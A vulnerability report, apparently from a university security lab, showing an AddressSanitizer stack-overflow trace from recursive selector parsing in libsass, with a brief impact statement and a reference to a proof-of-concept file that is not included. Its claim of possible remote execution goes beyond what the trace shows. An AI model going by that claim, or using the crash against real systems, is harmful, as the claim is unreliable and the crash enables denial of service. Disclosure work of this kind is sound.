
Ubuntu 20.04.2 LTS
Linux 5.4.0-65-generic

****4\. Command********5\. Result****

AddressSanitizer:DEADLYSIGNAL
=================================================================
==3151197==ERROR: AddressSanitizer: stack-overflow on address 0x7ffe016a7ff8 (pc 0x000000b9c0f5 bp 0x0c1a00000ab2 sp 0x7ffe016a8000 T0)
    #0 0xb9c0f4 in Sass::CompoundSelector::has\_real\_parent\_ref() const src/ast\_selectors.cpp:557
    #1 0xb92ed5 in Sass::ComplexSelector::has\_real\_parent\_ref() const src/ast\_selectors.cpp:474
    #2 0xb92ed5 in Sass::SelectorList::has\_real\_parent\_ref() const src/ast\_selectors.cpp:365
    #3 0xb929f8 in Sass::PseudoSelector::has\_real\_parent\_ref() const src/ast\_selectors.cpp:337
    #4 0xb9c217 in Sass::CompoundSelector::has\_real\_parent\_ref() const src/ast\_selectors.cpp:564
    #5 0xb92ed5 in Sass::ComplexSelector::has\_real\_parent\_ref() const src/ast\_selectors.cpp:474
    #6 0xb92ed5 in Sass::SelectorList::has\_real\_parent\_ref() const src/ast\_selectors.cpp:365
    #7 0xb929f8 in Sass::PseudoSelector::has\_real\_parent\_ref() const src/ast\_selectors.cpp:337
    #8 0xb9c217 in Sass::CompoundSelector::has\_real\_parent\_ref() const src/ast\_selectors.cpp:564
    #9 0xb92ed5 in Sass::ComplexSelector::has\_real\_parent\_ref() const src/ast\_selectors.cpp:474
    #10 0xb92ed5 in Sass::SelectorList::has\_real\_parent\_ref() const src/ast\_selectors.cpp:365
    #11 0xb929f8 in Sass::PseudoSelector::has\_real\_parent\_ref() const src/ast\_selectors.cpp:337
    #12 0xb9c217 in Sass::CompoundSelector::has\_real\_parent\_ref() const src/ast\_selectors.cpp:564
    ...
    #323 0xb929f8 in Sass::PseudoSelector::has\_real\_parent\_ref() const src/ast\_selectors.cpp:337
    #324 0xb9c217 in Sass::CompoundSelector::has\_real\_parent\_ref() const src/ast\_selectors.cpp:564
    #325 0xb92ed5 in Sass::ComplexSelector::has\_real\_parent\_ref() const src/ast\_selectors.cpp:474
    #326 0xb92ed5 in Sass::SelectorList::has\_real\_parent\_ref() const src/ast\_selectors.cpp:365
    #327 0xb929f8 in Sass::PseudoSelector::has\_real\_parent\_ref() const src/ast\_selectors.cpp:337
    #328 0xb9c217 in Sass::CompoundSelector::has\_real\_parent\_ref() const src/ast\_selectors.cpp:564
    #329 0xb92ed5 in Sass::ComplexSelector::has\_real\_parent\_ref() const src/ast\_selectors.cpp:474
    #330 0xb92ed5 in Sass::SelectorList::has\_real\_parent\_ref() const src/ast\_selectors.cpp:365
    #331 0xb929f8 in Sass::PseudoSelector::has\_real\_parent\_ref() const src/ast\_selectors.cpp:337

SUMMARY: AddressSanitizer: stack-overflow src/ast\_selectors.cpp:557 in Sass::CompoundSelector::has\_real\_parent\_ref() const
==3151197==ABORTING

****6\. Impact****

This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution.

****7\. POC****

Download: poc2

**Report of the Information Security Laboratory of Ocean University of China @OUC\_ISLOUC @OUC\_Blue\_Whale**

Tag

#ubuntu